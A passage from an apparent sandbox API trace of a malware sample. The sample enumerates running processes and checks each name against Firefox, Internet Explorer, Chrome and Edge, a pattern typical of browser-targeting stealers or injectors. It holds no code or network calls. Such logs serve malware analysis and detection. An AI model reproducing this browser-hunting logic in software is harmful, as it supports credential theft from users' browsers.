lpString2="firefox.exe") returned 1 [0162.231] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0162.231] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0162.231] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0162.231] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0162.231] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0162.231] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0162.231] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0162.231] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0162.231] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.232] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0162.232] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0162.232] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0162.232] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.232] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.232] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0162.232] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0162.232] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0162.233] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.233] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.233] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0162.233] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0162.233] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0162.233] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.233] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.234] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0162.234] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0162.234] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0162.234] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.234] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.234] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0162.234] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0162.234] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0162.234] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.234] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0162.235] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0162.235] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0162.235] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0162.235] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0162.235] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.236] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0162.236] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0162.236] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0162.236] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.236] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.236] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0162.236] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0162.236] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0162.236] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.236] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0162.237] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0162.237] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0162.237] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0162.237] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0162.237] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0162.237] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0162.237] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0162.237] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0162.237] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.237] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0162.238] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0162.238] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0162.238] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0162.238] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.238] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.238] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0162.238] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0162.238] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0162.238] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.239] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0162.239] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0162.239] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0162.239] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0162.239] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.239] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0162.240] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0162.240] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0162.240] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0162.240] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0162.240] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0162.240] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0162.240] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0162.240] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0162.240] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0162.240] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0162.241] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0162.241] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0162.241] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0162.241] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.241] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0162.241] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0162.241] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0162.241] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0162.241] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0162.241] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0162.242] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0162.242] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0162.242] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0162.242] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0162.242] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0162.242] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0162.242] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0162.243] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0162.243] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.243] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0162.243] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0162.243] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0162.243] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0162.243] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.243] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0162.244] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0162.244] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0162.244] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0162.244] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.244] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0162.244] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0162.244] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0162.244] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0162.244] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.244] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0162.245] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0162.245] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0162.245] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0162.245] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0162.245] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0162.245] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0162.245] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0162.245] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0162.245] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.245] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0162.246] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0162.246] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0162.246] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0162.246] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.246] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0162.247] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0162.247] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0162.247] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0162.247] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.247] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0162.247] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0162.247] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0162.247] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0162.247] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.247] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0162.248] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0162.248] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0162.248] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0162.248] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.248] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0162.248] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0162.248] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0162.248] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0162.249] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0162.249] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0162.249] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0162.249] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0162.249] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0162.249] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0162.249] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0162.250] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0162.250] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0162.250] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0162.250] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0162.250] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0162.250] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0162.250] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0162.250] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0162.250] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.250] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0162.251] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0162.251] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0162.251] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0162.251] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0162.251] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0162.251] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0162.251] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0162.251] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0162.251] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.251] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0162.252] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0162.252] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0162.252] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0162.252] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.252] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.253] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0162.253] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0162.253] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0162.253] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.253] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0162.253] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0162.253] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0162.253] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0162.253] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.253] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.254] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0162.254] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0162.254] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0162.254] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.254] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0162.254] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0162.254] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0162.254] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0162.254] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.254] Process32Next (in: 